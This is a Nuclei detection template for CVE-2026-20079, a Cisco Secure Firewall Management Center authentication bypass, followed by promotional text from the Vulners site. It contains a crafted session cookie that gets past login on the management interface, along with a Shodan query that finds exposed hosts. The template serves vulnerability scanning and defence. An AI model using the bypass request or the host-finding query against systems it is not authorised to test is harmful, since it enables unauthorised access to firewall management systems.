Cisco Secure Firewall Management Center - Authentication Bypass
10
id: CVE-2026-20079
info:
name: Cisco Secure Firewall Management Center - Authentication Bypass
author: theamanrawat
severity: critical
description: |
Cisco Secure Firewall Management Center Software contains an authentication bypass caused by improper system process creation at boot, letting unauthenticated remote attackers execute scripts and gain root access, exploit requires crafted HTTP requests.
impact: |
Unauthenticated remote attackers can gain root access by executing scripts, leading to full system compromise.
remediation: |
Update to the latest available version.
reference:
- https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079
- https://nvd.nist.gov/vuln/detail/CVE-2026-20079
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2026-20079
epss-score: 0.37671
epss-percentile: 0.98411
cwe-id: CWE-288
metadata:
verified: true
max-request: 1
shodan-query: html:"BackdraftSyncIntegration"
tags: cve,cve2026,cisco,fmc,auth-bypass,rce,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET /help/about.cgi HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(body, "Invalid session ID")'
condition: and
internal: true
- raw:
- |
GET /help/about.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: CGISESSID=csm_processes
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Cisco Secure Firewall Management Center", "Model", "OS", "Hostname")'
condition: and
# digest: 4a0a004730450220417eaf7bd9bf89290569b4f2ff38368bd47a47f884691117494a5c8397b31eb7022100fa9bf4c9a748983c2dc6041f10aa078b850e2cf5f22e8a797fb319052d882e15:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Apr 2026 16:12Current
9.2High risk
Vulners AI Score9.2
CVSS 3.110
EPSS0.37671
SSVC